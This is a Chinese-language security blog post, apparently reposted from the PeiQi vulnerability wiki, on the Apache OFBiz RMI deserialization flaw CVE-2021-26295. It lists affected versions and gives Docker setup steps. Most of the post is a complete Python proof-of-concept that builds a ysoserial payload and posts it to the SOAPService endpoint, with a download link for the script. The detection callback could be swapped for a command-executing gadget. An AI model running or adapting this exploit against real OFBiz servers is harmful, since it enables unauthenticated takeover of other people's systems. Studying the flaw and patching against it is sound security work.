Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

admin
admin
admin
140350
文章
117
评论
2021年3月23日16:20:03评论189 views字数 2336阅读7分47秒阅读模式

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295



:漏洞描述🐑


OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。

近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。


二:  漏洞影响🐇


Apache OFBiz < 17.12.06




三:  漏洞复现🐋


Docker安装环境

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295


使用POC验证Dnslog响应

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295



 四:  漏洞POC🦉


下载地址 http://peiqi.tech/shentou/CVE-2021-26295.zipPOC参考了网上公开的几位师傅的脚本

import requestsimport sysimport sysimport subprocessimport binasciifrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  33[34mPOC_Des: http://wiki.peiqi.tech                                   33[0m')    print('+  33[34mGithub : https://github.com/PeiQi0                                 33[0m')    print('+  33[34m公众号  : PeiQi文库                                                   33[0m')    print('+  33[34mVersion: Apache OFBiz                                            33[0m')    print('+  33[36m使用格式:  python3 poc.py                                            33[0m')    print('+  33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+  33[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             33[0m')    print('+------------------------------------------')
def trans(s):    return "%s" % ''.join('%.2x' % x for x in s)
def POC_1(target_url, Dnslog):    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE)    data = popen.stdout.read()    hex_data = trans(data)    headers = {        'Content-Type': 'text/xml'    }    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data    vuln_url = target_url + "/webtools/control/SOAPService"    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)        print("33[36m[o] 正在请求 {}/webtools/control/SOAPService..... 33[0m".format(target_url))        if response.status_code == 200:            print("33[36m[o] 请检查 Dnslog 响应n 33[0m")        else:            print("33[31m[x] 请求失败 33[0m")            sys.exit(0)
    except Exception as e:        print("33[31m[x] 请求失败 33[0m")

if __name__ == '__main__':    title()    target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))    Dnslog = str(input("33[35mDnslog >>> 33[0m"))    POC_1(target_url, Dnslog)



 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


文库接收文库中未收录的漏洞投稿啦,一起建设文库啦~


本文始发于微信公众号(PeiQi文库):Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月23日16:20:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache OFBiz RMI反序列化漏洞 CVE-2021-26295https://cn-sec.com/archives/298854.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息